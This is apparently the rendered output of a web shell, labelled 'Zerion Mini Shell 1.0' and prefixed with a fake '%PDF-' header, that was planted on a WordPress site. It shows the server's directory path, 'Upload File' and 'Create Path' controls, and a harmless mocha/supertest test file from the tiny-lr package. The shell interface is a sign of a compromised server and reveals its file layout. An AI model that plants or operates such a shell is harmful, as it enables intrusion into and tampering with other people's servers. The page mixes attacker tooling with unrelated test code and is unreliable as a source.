%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/projetos/stb.ind.br/wp-content/themes/stb/node_modules/tiny-lr/test/
Upload File :
Create Path :
Current File : /var/www/projetos/stb.ind.br/wp-content/themes/stb/node_modules/tiny-lr/test/http.js

import app from '../examples/express/app';
import request from 'supertest';

describe('mocha spec examples', () => {
  describe('tinylr', () => {
    it('GET /', done => {
      request(app)
        .get('/')
        .expect('Content-Type', /text\/html/)
        .expect(/Testing/)
        .expect(200, done);
    });
  });
});

Zerion Mini Shell 1.0